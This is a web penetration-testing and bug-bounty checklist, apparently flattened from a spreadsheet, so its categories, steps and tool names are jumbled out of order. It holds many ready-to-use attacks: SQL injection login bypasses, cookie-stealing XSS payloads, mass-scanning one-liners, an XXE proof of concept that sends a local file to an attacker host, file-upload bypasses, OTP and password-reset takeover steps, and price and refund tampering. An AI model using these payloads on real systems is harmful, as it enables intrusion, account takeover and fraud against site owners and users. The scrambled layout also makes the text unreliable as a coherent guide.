Sr. No.

Category

Fingerprinting Application

5
6

7
8

10
11
Network Testing

12

13
14 Application Mapping

15
Application Component Audit
16
17
18

19

20

21
22
23
24
25
26

Audit Session management

 Audit Session management

27

28

29

30

31
32
33
34
35
36

Audit Registration

37

38

39

40

41
42
43
44

45

46

47
Audit Authentication
 Audit Authentication

48

49

50
51
Error codes Testing
52
53

54
55

56

57

58

59

60

61 Post login account information testing /

Testing My Account information
 Post login account information testing /
Testing My Account information

62

63
64

65

66

67

68

69

70

71
72
73
74
75
76
77
78
79
80
81

Forgot Password Testing

82

83
84
85
Contact us / Feed Back Form Testing
86
87

88

89
Product Purchase Testing

90

91

92

93

94

Flight Railway Hotel Cab etc. Booking

Testing
95
 Flight Railway Hotel Cab etc. Booking
Testing

96

97

98

99

100

101

102
103

104
105
106

107

Cross Site Scripting (XSS)

108

109

110

111

112

113
114
115

116
117

118

SQL Injection
119

120

121

122

Open Redirection

123

124 Host header attack

125 SAP Application Testing

126 ASP.NET website testing

127
128
129
130
131 CSRF token testing

132

133
134 XML Injection Testing

135

136

137
138

139

140
Banking Application Auditing

141

142

143

144

145

146

147

148
149
Web Services testing
150
151

152
153 Automated Scanners

154

155

CAPTCHA Testing
156

157

158

159

160
161

162

163

164
165

166

167

Other Testcases
168 Other Testcases

169

170

171

172

173

174

175

176

177

178
179

180
181
182

183

184
185
186
187
188
189
190

191

192

193

194 Find secrets using Burp Extension

195 Use GF patterns to identify potential input points

196 Jales Scan
197 Making Favicon.ico based Recon Great again !
198 Find secrets on Github
199 HTTP parameter discovery suite.
200 Broken Link Hijacking

Web Hacker's Weapons / A collection of cool tools

201 used by Web hackers. Happy hacking , Happy bug-
hunting
202 The Bug Hunter's Methodology (TBHM)

203 SSRF/LFI

204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
Activity

Bruteforce sub domains

Directory enumeration via:

Dirb
Gobuster
BirpSuite
ZAP Proxy

Identify the underlying web client and server technology

Uncover HTTP services running on ports other than 80 and 443

Leaked info

Use https://dorks.faisalahmed.me for Google dorking

Find sensitive information through keywords after crawling entire website.

Keywords such as

Password, admin, http, todo

a. Search for http:// to find insecure endpoints in an application

b. Search for keywords like admin, todo etc to find interesting stuff

c. Search for both http:// & https:// to find hidden endpoints in js files
Test for ping
Use Censys

DNS testing -
- Zone transfer
- Missing Certification Authority Authorization (CAA) Record
- Missing DNSSEC
Nessus scan
Banner disclosure of services other than 80 and 443.

Find all web servers using Nmap

UDP proto scanner

Generate site structure

Identify known vulnerabilities in the web/app server

SSL/TLS certificate testing

Identify actual session cookie out of bulk cookies in the application.
Decode cookies using some standard decoding algorithms such as Base64,
hex, URL etc.
Modify cookie.session token value by 1 bit/byte. Then resubmit and do the
same for all token. Reduce the amount of work you need to perform in
order to identify which part of token is actually being used and which is
not.
If self-registration is available and you can choose your username, log in
with a series of similar usernames containing small
variations between them, such as A, AA, AAA, AAAA, AAAB, AAAC, AABA,
and so on. If other user-specific data is submitted at login or stored in user
profiles (such as an e-mail address)
Token leakage via Referer header - Untrusted 3rd Party
Check for session cookies and cookie expiration date/time
Identify cookie domain scope
Check for HttpOnly flag in cookie
Check for Secure flag in cookie if the application is over SSL
Check for session fixation i.e. value of session cookie before and after
authentication
Password reset link token does not expire(Insecure Configurability)

Replay the session cookie from a different effective IP address or system

to check whether server maintains the state of the machine or not.

Old session does not expire

Check for concurrent login through different machine/IP

Check if any user pertaining information is stored in cookie value or not

If yes, tamper it with other user's data.
Check for duplicate registration / Overwrite exisiting user
Check for weak password policy
Check for the stored chintan in username, account name for registration.
Check for insufficient email verification process
Weak registration implementation - Allows dispostable email addresses
Overwrite default web application pages by specially crafted username
registrations.
=> After registration, does your profile link appears something as
www.chintan.com/chintan ?
a. If so, enumerate default folders of web applicatio such as /images,
/contact, /portfolio
b. Do a registration using the username such as images, contact, portfolio
c. Check if thsoe default folders have been overwritten by your profile link
or not.
Username enumeration
Bypass authentication using various SQL Injections on username and
password field.
Use combinations of below injections
chintan' --
chintan' #
chintan'/*
' or 1=1 --
' or 1=1 #
' or 1=1/*
') or '1'='1 --
') or ('1'='1 --
Auto-complete testing
Lack of password confirmation on -
- Chang eemail address
- Change password
- Manage 2FA

CHECK 2FA Cheatsheet from the Resource Section

Is it possible to use resources without authentication?
Access violation
Check if user credentials are transmitted over SSL or not.
Weak login function - HTTP and HTTPS both are available.
Test user account lockout mechanism on bruteforce attack

Variation : If server blocks instant user requests, then try with time throttle
option from intruder and repeat the process again.

A. Bypass rate limiting by tampering user agent to Mobile User agent.

B. Bypass rate limiting by tampering user agent to Anonmous user agent.

Create a password wordlist using cewl command -

https://www.hackingarticles.in/comprehensive-guide-on-cewl-tool/

cewk -m 12,20 -w ~/Desktop/chintan.txt chintan.com

Use the wordlist with the Transmute python file to create complex wordlist
for the bruteforce process. - https://github.com/eshork/transmute

OTP Bypass response manipulation( Register or login or password reset )

"Get /admin /HTTP/1.1Host: web.com 403 ForbiddenGet /anything /HTTP/1.1Host: web.comX-Or

Test 0auth login functionality for Open Redirection

1) Use burp 'find' option in order to find parameters such as url, red,
redirect, redir, origin,dest, targetURL, checkout_URL etc.
2) Check the vlaue of these parameter which may contain a URL.
3) Check open redirection for 0auth functionality.
4) Change the URL value to www.chintan.com and check if gets redirected
or not.
5) Check if same secret code request can be used multiple times.
Generate custom pages such as /chintan.php, chintan.aspx and identify
error page
Add multiple parameters in same post get request using different value
and generate error
Add [], ]], and [[ in cookie values and parameter values to create errors
Try to generate unusual error code by giving input as /~chintan/%s at the
end of website URL
Find parameter which uses active account user id. Try to tamper it in order
to change the details of other account.
Create a list of features that are pertaining to a user account only.
- Change Email
- Change Password
- Change account details (Name, Number, Address, etc.)

Try CSRF
Post login change email id and update with any existing email id. Check if
its getting validated on server side or not. Does the application send any
new email confirmation link to a new user or not? What if a user does not
confirm the link in some time frame?
Perform all file upload test using extension tampering and file content
modifying.

Unsafe File upload -

- No Antivirus
- No Size Limit
- File extension Filter Bypass

Want to bypass file upload restrictions?

Add ' , . " after the file extension just like:
file.php' , file.php. , file.php"
Open profile picture in new tab and check the URL. Find email id/user id
info.

EXIF Geolocation Data Not Stripped From Uploaded Images.

Check account deletion option if application provides it and confirm that
via forgot password feature
Change email id, account id, user id parameter and try to bruteforce other
user's password
Check whether application re-authenticates for performing sensitive
operation for post authentication features
Privilege escalation

Steps To Reproduce:

Sign into gitlab app as some user (attacker)

Go to the active sessions settings tab and revoke all the sessions
besides the current active one
Sign into gitlab app in other browser as administrator (admin)
Go to users admin section and impersonate attacker user
Update the active sessions tab as attacker and make sure the second
session appeared there (this is the admin logged into your account)

Inspect the Revoke button and make sure you see the session ID there.
Copy it. ████
Go to index page of gitlab as attacker (http://gitlab.bb/ in my case), I do
not know why, but it is important step
Clear attacker browser's cookie
Open the developer console as attacker and manually set
_gitlab_session to the copied one with:

document.cookie = "_gitlab_session=█████";

Refresh the attacker's page and make sure you are now inside the
impersonated session

Click Stop impersonating at the top-right corner as attacker and make

sure you are now logged in as gitlab admin. ███

Impact

Every gitlab authenticated user can escalate his privileges to admin ones
and give complete access to all gitlab services, projects and abilities. Only
he needs to do is ask admin to impersonate his account because of
something works bad there.

https://hackerone.com/reports/493324
Failure to invalidate session on Logout and Password reset
Check if forget password reset link/code uniqueness

Check if reset link does get expire or not if its not used by the user for
certain amount of time
Find user account identification parameter and tamper Id or parameter
value to change other user's password

Check for weak password policy

Weak password reset implementation - Token is not invalidated after use

If reset link have another params such as date and time then
a. Change date and time value in order to make active & valid reset link.

Check if security questions are asked?

a. How many guesses allowed? -> Lockout policy maintaind or not?
Add only spaces in new password and confirmed password. Then Hit enter
and see the result.
Does it display old password on the same page after completion of forget
password formality?
No domain
No tld
JSON table

Separators

Carbon Copy
Double Parameter
Ask for two password reset link and use the older one from user's email

Check if active session gets destroyed upon changing the password or

not?

Weak password reset implementation - Password reset token sent over

HTTP
Send continuous forget password requests so that it may send sequencial
tokens
Is CAPTCHA implemented on contact us form in order to restrict email
flooding attacks?

Does it allow to upload file on the server?

A. Buy Now
-> Tamper product ID to purchase other high valued product with low
prize
-> Tamper product data in order to increase the number of product with
the same
prize
B. Gift / Voucher
-> Tamper gift/voucher count in the request (if any) to increase/decrease
the number of vouchers/gifts to be used
-> Tamper gift/voucher value to increase/decrease the value of voucher
in terms of money. (e.g. $100 is given as a voucher, tamper value to
increase, decrease money)
-> Reuse gift/voucher by using old gift values in parameter tampering.
-> Check the uniqueness of gift/voucher parameter and try guessing
other gift/voucher code.
-> Use parameter polution technique to add same voucher twice by
adding same parameter name and value again with & in the BurpSuite
request.

C. Add/Delete Product from Cart

-> Tamper user id to delete products from other user's cart.
-> Tamper cart id to add/delete products from other user's cart.
-> Identify cart id/user id for cart feature to view the added items from
other user's account.
D. Address
-> Tamper BurpSuite request to change other user's shipping address to
yours.
-> Try stored-XSS by adding XSS vector on shipping address.
-> Use parameter pollution technique to add two shipping address
instead of one trying to manipulate application to send same item on two
shipping address.
E. Place Order
-> Tamper payment options parameter to change the payment method.
E.g. Consider some items cannot be ordered for cash on delivery but
tampering request parameters from debit/credit/paypal/netbanking option
to cash on delivery may allow you to place order for that particular item.
-> Tamper the amount value for payment manipulation in each main and
sub requests and responses.
-> Check if CVV is going in cleartext or not.
-> Check if credit/debit card details are masked or not.
-> Check if application itself process your card details and then perform
transaction or it calls any third party payment processing company to
perform transaction.

F. Track oder
-> Track other user's order by guessing order tracking number
A. Booking details
-> View/Manage other user's booking details.
-> Check reservation status for other users/behalf of other users.
B. Ticket/vouchers
-> View other users vouchers/e-tickets from PRINT option
-> Check if sensitive data is passed in GET request
-> If e-ticket/voucher is sent on email then check for the email flooding
C. Refund
attack.
-> View other user's refund status.
-> Refund more money than the intended one by parameter
manipulation.
-> If refund tracking is allowed then gain other user's refund tracking
status.
D. Cancellation
-> Gain higher cancellation amount with parameter modifying for amount
value.
E. Booking
-> Do 1st person booking and add 3 other persons in same prize
-> Hotel - Book normal room - Select Delux room in the same prize

Locator: '';!--"<chintan>=&{()}

Try XSS using XSSstrike tool by Somdev Sangwan

python3.8 xsstrike.py --seeds domains.txt --crawl -l 3 --skip --skip-dom

Upload file using '"><img src=x onerror=alert(document.domain)>.txt
Standard payload for URI and all inputs:
"><img src=x onerror=prompt(document.cookie);><!--
"><img src=x onerror=confirm(document.cookie);><!--
"><img src=x onerror=alert(document.cookie);><!--
If script tags are banned, use <h1> and other HTML tags
If output is reflected back inside the javascript as a value of any variable
just use alert(1)
if " are filtered then use this payload
/><img src=d onerror=confirm(/chintan/);>
Upload a javascript using Image file
Unsual way to execute your JS payload is to change method from POST to
GET. It bypasses filters sometimes.
findomain -t bugskan.com -q | httpx -silent | anew | waybackurls | gf xss
>> xssss ; grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|
ico|pdf|svg|txt|js)" | qsreplace '"><script>confirm(1)</script>' | while
read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs
"<script>confirm(1)</script>" && echo "$host \033[0;31mVulnerable\n";
done
cat urls.txt | gf xss | qsreplace '"><script>confirm(1)</script>' | while
read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs
"<script>confirm(1)</script>" && echo "$host \033[0;31mVulnerable\n";
done
gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://"
| grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'
Tag attribute value
1. Input landed - <input type=”text” name=”state” value=”INPUT_FROM_
USER”>
2. payload to be inserted - “ onfocus=”alert(document.cookie)
Syntax Encoding payload
“%3cscript%3ealert(document.cookie)%3c/script%3e
ASP.NET IE9 chintan Filter evasion for htmlentities
&lt;%tag style=”chintan:expression(alert(‘chintan’))”&gt;
‹%tag style=”chintan:expression(alert(123))”
‹%tag style=”chintan:expression(alert(123))”

Try base64 payload

If the logout button just performs the redirection then use old classic XSS
payload
Polygot payload

Use pure JS payload that worked for many popular websites if your input is
reflected back in the JavaScript.
Locator -
Test'" 123' "Þ}j%Ùÿ
'
"
'"
"'
;'
'"();=,%+-/**/ --
If parameter=static_integer_value then follow below method
if id=4, then try id=3+1 or id=6-2 (if page loads in same way, it is
vulnerable)
Use SQLmap to identify vulnerabile parameters
1. Fill form in browser GUI submit it normally.
2. Go to history tab in burpsuite and find the relevent request.
3. Right click and select the option "copy to file".
4. Save file as anyname.txt
5. SQLmap command to run
python sqlmap.py -r ~/Desktop/textsqli.txt
--proxy="http://127.0.0.1:8080"
Search SQL injection syntax error using qsreplace, waybackurls

grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output
-threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf
"TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \
033[0;31mNot Vulnerable\e[m\n"
Database Management System (DBMS) Misconfiguration
Open redirect mass using oranalyser

python3.8 oralyzer.py -f urls.txt

1) Use burp 'find' option in order to find parameters such as url, red,
redirect, redir, origin, redirect_uri, target etc.

2) Check the vlaue of these parameter which may contain a URL.

3) Change the URL value to www.chintan.com and check if gets redirected

or not.

4) Give below URL in web browser and check if application redirects to the
www.chintan.com website or not.

https://www.target.com/ÿ/www.twitter.com/
https://www.target.com//www.twitter.com/
https://www.target.com/ÿ/www.twitter.com/
https://www.target.com//www.twitter.com/

5) Bypass filter using returnTo=///chintan.com/

6) Bypass filter using returnTo=http:///chintan.com/

Inset new header in the GET/POST request as follows:

X-Forwarded-Host: www.chintan.com
If it gets redirected from the target application then its vulnerable

Capture any request,

Change the host to google.com and see if its getting redirected or not
SAP Netweaver Application
1. Form the default error page derive the hostname & system information
2. Do an NMAP scan and check for WebDAV methods on other ports than
80 & 44.

Check if ASP.net viewstate parameter is encrypted or not

Re-use Anti-CSRF token for CSRF attack
Check if token is validated on server side or not
Check if token validation for full length or partial length
Create few dummy account and compare the CSRF token for all those
accounts
Bypass CSRF token using 2 input type fields in for updating user's
information in the same HTML file
Convert POST request to GET and remove _csrf (anti-csrf token) to bypass
the CSRF protection.
Check if the value you are trying to change is passed in multiple
parameters such as cookie, http headers along with GET and POST
request.
Proof of concept:
-----------------
1) XML External Entity Injection (CVE-2016-8526)
a) XXE in VisualRF Backup Sites

Login as any user role (including read-only/standard user)

Navigate to VisualRF > Floor Plans > Select 'View' under 'Network'
section.
Select a campus (e.g. Default Campus) > Select 'Edit' >
Select action 'Export Floor Plans' > Ok

POST /visualrf/backup_sites HTTP/1.1

Host: <AirWaveHost>
[...]

xml=<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE x [<!ENTITY

%25 foo SYSTEM
"http://<AttackerHost>:1234/sectest.dtd">%25%66%6f%6f%3b
%25%70%61%72%61%6d%31%3b]><visualrf:sites
xmlns:visualrf="http://www.airwave.com/";
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";
version="1">%26%65%78%66%69%6c%3b</visualrf:sites>

$ cat sectest.dtd
<!ENTITY % data SYSTEM "file:///<removed>">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM
'ftp://<Attacker>:2121/%data;'>">

$ python -m SimpleHTTPServer 1234

$ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-
ftp-server.rb
$ ruby xxe-ftp-server.rb
FTP. New client connected
< USER anonymous
OTP testing
1. Check for OTP bypass
2. Check for OTP reuse
3. Check for increasing OTP validity via parameter tampering

Billing Activity Testing

1.Check if user 'A' can view the account statement for user 'B'
2.Check if user 'A' can view the transaction report for user 'B'
3.Check if user 'A' can view the summary report for user 'B'
4.Check if user 'A' can register for monthly/weekly account statement via
email behalf of user 'B'
5.Check if user'A' can update the existing email id of user 'B' in order to
retrive monthly/weekly account summary
Deposit/Loan/Linked/External Account Checking
1.Check if user 'A' can view the deposit account summary of user 'B'
2.Check for account balance tampering for Deposit accounts.
Tax Deduction Inquiry Testing
1. Check if user 'A' with it's customer id 'a' can see the tax defuction
details of user 'B' by tampering his/her customer id 'b'
2. Check parameter tampering for increasing and decreasing interest
rate, interest ammount, and tax refund.
3. Check if user 'A' can download the TDS details of user 'B'.
Check if user 'A' can request for the cheque book behalf of user'B'.
Fixed Deposit Account Testing
1. Check if is it possible for user 'A' to open FD account behalf of user 'B'.
2. Check if Can user open FD account with the more amount than the
current account balance.
Stopping Payment on basis of cheque/date range
1. Can user 'A' stop the payment of user 'B' via cheque number.
2. Can user 'A' stop the payment on basis of date range for user 'B'
Status Enquiry Testing
1. Can user 'A' view the status enquiry of user 'B'
2. Can user 'A' modify the status enquiry of user 'B'
3. Can user 'A' post and enquiry behalf of user 'B' from his own account.

Fund transfer testing

1. Is it possible to transfer funds to user 'C' instead of user 'B' from the
user 'A' which was intended to transfer from user 'A' to user 'B'
2. Can fund transfer amount be manipulated?
3. Can user 'A' modify the payee list of user 'B' by parameter
manipulation using his/her own account.
4. Is it possible to add payee withot any proper validation in user 'A' 's
own account or to user 'B' 's account.
Schedule transfer testing
1. Can user 'A' view the schedule transfer of user 'B'
2. Can user 'A' change the details of schedule transfer for user 'B'
Testing of fund transfer via NEFT
1. Amount manipulation via NEFT transfer.
2. Check if user 'A' can view the NEFT transfer details of user 'B'.
Testing for Bill Payment
1. Check if user can register payee without any checker approval
2. Check if user 'A' can view the pending payments of user 'B'
3. Check if user 'A' can view the payment made details of user 'B'
SOAP messege tampering
1. Bruteforcing using *
2. Bruteforcing using user credentials
3. Parameter guessing
Convert GET to POST and POST to GET methods
SQL Injection
1. ' " - * )
Directory traversal
../../../../../autoexec.bat
XML Poisoning
Enumeration and profiling
1. <service> - Web service
2. <operation> - Web methods
3. <element> - Data types
4. <endpoint> - Web service address
Use automated scanners one by one against the application
Replay attack
1. Send old captcha value with if accepts then it is vulnerable.
2. Send old captcha value with old session ID, if its accepts then it is
vulnerable.

Check if captcha is retrivable with the absolute path such as

www.chintan.com/internal/captcha/images/24.png

Check for the server side validation for CAPTCHA

1. Remove captcha block from GUI using firebug addon and submit
request to the server.
Check if image recognition can be done with OCR tool?
a. If OCR identifies then report as weak strenght of captcha - OCR
(Optical Character Recognition)
b. If no then secure.
Check for SSRF Vulnerability by giving www.chintan.com:22 ,
www.chintan.com:23 etc. Check for the response page and determine if
port 22 is opened in chintan website. If yes then target website is
vulnerable to SSRF vulnerability.
Check for
- Clickjacking on Sensitive Action
- X-XSS header
- HSTS header
- CSP header
- Referrer-Policy
- Cache Control
- Public key pins
- X-Webkit-CSP

Command injection through CSV export.

1. Consider a scenario where you can export the list of registered user or
group members through the application portal.
2. Write=2*10 in first name, last name etc..
3. Export the CSV and check if command executed successfully or not.
4. If result shows 20 in first name, you can spread malware through CSV.
DDOS using xmlrpc.php

If website has a feature for importing contacts from .CSV files then
1. Add one contact in your CSV file with the name
"><script>alert("chintan")</script>
2. Import contact to the website
3. Check if script getting executed or not.

CSV Excel Macro Injection

Find metadata for the downloadable objects

Review Image files, PDF files and other object's metadata for information
leakage
Test Rich Internet Application RIA cross domain policy
1. Try to access crossdomain.xml
2. Try to access clientaccesspolicy.xml
Testing for Role authorization
1. Check if normal user can access the resources of high privilaged users?
2. Forced browsing
3. Insecure direct object reference
4. Parameter tampering to switch user account to high privileged user.
No rate limiting on form:
- Registration
- Login
- Email triggering
- SMS triggering
Test for OTP
1. Try injection to bypass OTP vertification
2. Check for guessable OTP codes
3. Check for the response in order to bypass OTP.
4. Give ' in OTP and check if you can bypass it or not.

Additional Scenario
While signing up as a new user, the OTP is sent to the mobile number
registered with the account. Submit the OTP value from your mobile
device and intercept the request. Edit the mobile number with an already
registered number. You can login as another user in the application and
perform action on his behalf. The response includes the user’s email
address, name and contact number.

If you find phpinfo.php file, check for the configuration leakage and try to
exploit any network vulnerability.

Bypass SAML authentication by response tampering

If CSP header blocks the clickjacking attack and origin parameter is present in the
original request then this scenario can be bypassed by adding unicode characters in
the value of origin header.

Use PATCH HTTP header to find information disclosure

Check whether the application uses any ipAddress parameter or not.

If yes, then decimal IP address can be converted into real ip for information
disclosure.

Imagemagick GIF coder vulnerability leads to memory disclosure

If the GIT repository file is found on the server, then try to download the entire source
code of the website using git-dumper tool.

Check for the Unsubscribe button

1. Subscribe to email id
2. Unsubscribe and check whether the website confirms first or sends any
notification to a user or not.
a. if yes - Not vulnerable
b. if no - Vulnerable (affects availability)

If a website has username enumeration issue then it becomes High-Medium level

issue.

Check whether the applicatio allow us to download the Excel file if yes then
download the excel file unzip it. Open the excel file.

Add your custom XXE payload /etc/passwd and upload on the server.
google_server_key
gsecr
heroku_api_key
heroku_key
heroku_oauth
heroku_oauth_secret
If the server is IIS 7 then test for
heroku_oauth_token
heroku_secret
IIS Short Name scanner
heroku_secret_token
HTTP.sys DOS RCE
htaccess_pass
Inspect all JS files, you might get lucky.
htaccess_user
Executable download - No secure integrity check
incident_bot_name
incident_channel_name
Directory listing - Non sensitive data exposure.
jwt_passphrase
jwt_password
Potentially unsafe HTTP method enabled
jwt_public_key
jwt_secret
OPTIONS PUT DELETE
jwt_secret_key
Reflected file download
jwt_secret_token
Parameter Pollution - Social Media Sharing Buttons
jwt_token
Full path disclosure
jwt_user
Internal Ip disclosure
keyPassword
Outdated software versions
location_hostname
Sensitive application data stored unencrypted - Internal storage
location_protocol
log_channel
Unsafe Cross-Origin-Resource Sharing
mail_driver
Wordpress testing
mail_encryption
- enumerate vulnerable plugins
mail_from_address
- enumerate vulnerable themes
mail_from_name
- enumerate email addresses and usernames
mail_host
- bruteforce using custom wordlist using wordpress
mail_password
Use searchsploit to find custom exploits
mail_port
mail_username
Use metasploit to find custom exploits
mailgun_key
- use metasploit --check option to check whether target is exploitable or not
mailgun_secret
- remember to give targetURI for the successful exploitation
mix_pusher_app_cluster
mix_pusher_app_key
mysql_password
node_env
oauth
oauth_discord_id
oauth_discord_secret
oauth_key
oauth_token
oauth2_secret
Take patterns and search throug application
password
Jales Signature Scan
paypal_identity_token
FavFreak
paypal_sandbox
paypal_secret
gitGraber
paypal_token
Arjun
playbooks_url
postgres_password
private
private_key
pusher_app_cluster
pusher_app_id
pusher_app_key
pusher_app_secret
queue_connection
queue_driver
redis_host
redis_password
redis_port
response_auth_jwt_secret
response_data_secret
response_data_url
root_password
sa_password
secret
secret_access_key
Manually find and click external links on the target site ( For Example:- Some Links
to Social Media Accounts or Some external Media Link)

While Doing Manual work also put broken-link-checker in background using below
Command interminal.

blc -rof --filter-level 3 https://example.com/

Ouput will be like Something.

─BROKEN─ https://www.linkedin.com/company/ACME-inc-/ (HTTP_999)

Now you need to check if company has the page or not , if no then register as the
company or try to get that username or url.

https://github.com/hahwul?tab=repositories

Manual hunt
Search for URL or Download parameter

Try file:///etc/passwd

url=file:///etc/passwd
download=file:///etc/passwd
Tools/Technique
Dnsdumster.com

builtwith.com

Sublist3r

python3 sublist3r.py -d chintan.com -

p80,443,8080,8001,8009,280,591,583,832,981,1311,2480,4444,4445,4567,5000
,5104,5800,7000,7001,7002,8008,8042,8088,8222,8243,8280,8281,8333,8530,8
531,8887,8888,8443,8834,9080,9443,9981,12043,12046,16080,18091,10443,18
092,81,300,593,1010,1311,2082,2087,2095,2096,3000,3128,3333,4243,4711,47
12,4993,5108,6543,7396,7474,8000,8001,8008,8014,8069,8080,8081,8090,809
1,8118,8123,8172,8443,8500,8880,8888,8983,9000,9043,9060,9090,9091,9200,
9800,12443,20720,28017

crt.sh - curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value'

| sed 's/\*\.//g' | httpx -title -silent | anew

Check for the third level domains

Altdns

Assetfinder

Amass enum -d target.com

Search subdomains in assetfinder using hakrawler spider to search links in

content responses - assetfinder -subs-only http://tesla.com -silent | httpx -timeout
3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -
linkfinder -depth 5 -url %' | grep "tesla"

Subfinder

Gospider - gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist

jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo
'(http|https)://[^/"]+' | anew
Dirbuster or Dirb with latest wordlist

Site:.domain.com

Find admin panel based on CMS or bruteforcing

Wappalyzer add-on

Response header
Nmap
Breach Compilation
We Leak Info
https://hunter.io/
https://dorks.faisalahmed.me
BurpSuite Engagement Tools

Ping CMD
Give domain name and find exposed devices, services, mail exchange servers and much
more.

Perform local WHOIS search instead of global WHOIS domain to find more information.

Nessus
Nmap
nmap -sS -n -Pn -p -sV 80,
443,8080,8001,8009,280,591,583,832,981,1311,2480,4444,4445,4567,5000,5104,5800,700
0,7001,7002,8008,8042,8088,8222,8243,8280,8281,8333,8530,8531,8887,8888, 8443,
8834, 9080,9443,9981,12043,12046,16080,18091,10443,18092, 81, 300, 593, 1010, 1311,
2082, 2087, 2095, 2096, 3000, 3128, 3333, 4243, 4711, 4712, 4993, 5108, 6543, 7396,
7474, 8000, 8001, 8008, 8014, 8069, 8080, 8081, 8090, 8091, 8118, 8123, 8172, 8443,
8500, 8880, 8888, 8983, 9000, 9043, 9060, 9090, 9091, 9200, 9800, 12443, 20720, 28017 -
iL target.txt -oA web_result -vvv –open
perl udp-proto-scanner.pl --file target.txt

Manual and Freemind tool.

1) Nessus scanning
2) Nexpose scanning
3) Exploit Suggestor
Qualys SSL/TLS Scan
Burpsuite Repeater
BurpSuite decoder and online websites

BurpSuite repeater

BurpSuite Repeater

BurpSuite Repeater
Burpsuite Session timeout test extender
Burpsuite Proxy
Firebug add-on (firefox)
Firebug add-on (firefox)
Burpsuite
1.Create your account on target
2.request a forget password link
3.Don't use that link
4.Instead logged in with your old password and change your email to other
5.Now use that password link sents to old email and check if you are able to
change your password if yes than there is the title bug.

Burpsuite and different ISP location

1.create your account
2.open two browser eg.,chrome and firefox
3.Login in one browser eg.chrome
4.In other browser(firefox) login either change your password or reset your
password
5.After successfully changed or reset go to other browser refresh the page if you
are still logged in
1) Firefox
2) Chrome
3) Internet Explorer

Manual
Manual
Manual
Burpsuite
Manual

Manual

Manual

1) Burpsuite
2) Manual

Manual

1) Burpsuite
2) Manual
1) Burpsuite
2) Manual
SSL/TLS lock

Burpsuite intruder with time throttle option

CewL
Transmute

1.Register 2 accounts with any 2 mobile number(first enter right otp)

2.Intercept your request
3.click on action -> Do intercept -> intercept response to this request.
4.check what the message will display like status:1
5.Follow the same procedure with other account but this time enter wrong otp
6.Intercept respone to the request
7.See the message like you get status:0
8.Change status to 1 i.e, status:1 and forward the request if you logged in means
you just done authentication bypass.
Burpsuite

Burpsuite
Burpsuite
Burpsuite
Burpsuite

Burpsuite
Burpsuite

Burpsuite

Burpsuite

Manual

Manual

1) Burpsuite
2) Manual

Manual
Manual

Manual
1) Burpsuite
2) Manual
1) Burpsuite
2) Manual
1) Burpsuite
2) Manual
1) Burpsuite
2) Manual
1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual
1) Burpsuite
2) Manual
email=victim
email=victim@xyz
{"email":["[email protected]","[email protected]"]}
[email protected], [email protected]
[email protected]%[email protected]
[email protected]|[email protected]
[email protected]%a%0dcc:[email protected]
[email protected]&[email protected]
1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

Burpsuite
Burpsuite

1) Burpsuite
2) Manual
1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual
1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

Burpsuite

Burpsuite

www.w3schools.com
Burpsuite

Burpsuite
gifsicle - Tool to bind javascript within GIF
Burpsuite

Terminal

Burpsuite

0;data:text/
html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwv
c2NyaXB0Pg=="HTTP-EQUIV="refresh"
javascript:alert(123)
/*–>]]>%>?></object></script></title></textarea></noscript</style></
xmp>’-/”/-alert(1)//><img src=1 onerror=alert(1)>’

); alert(document.domain); if (1
Burpsuite

Burpsuite

Burpsuite

Excessively Privileged User / DBA

python3.8 oralyzer.py -f urls.txt

Burpsuite

Burpsuite
1) Burpsuite
2) Manual

Burpsuite
Burpsuite
Burpsuite
Burpsuite
Burpsuite
Burpsuite

Burpsuite
Burpsuite Repeater

Burpsuite

Burpsuite

Burpsuite
Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite
Burpsuite

Burpsuite
Burpsuite

Burpsuite
1) Burpsuite
2) Netsparker

Burpsuite

Manual

Firebug addon

http://www.free-ocr.com/

Manual

Manual
Burpsuite Repeater

Manual

Manual

Burpsuite metadata extender

Burpsuite plugin for Metadata
Manual
Nikto
W3af

Manual
Burpsuite
Manual
Burpsuite Intruder

Manual
Burpsuite

For E.g:

https://myaccount.google.com/u/0/brandaccounts/group/{your-group-id}/managers?
originProduct=AC&origin=https://%0d.business.google.com

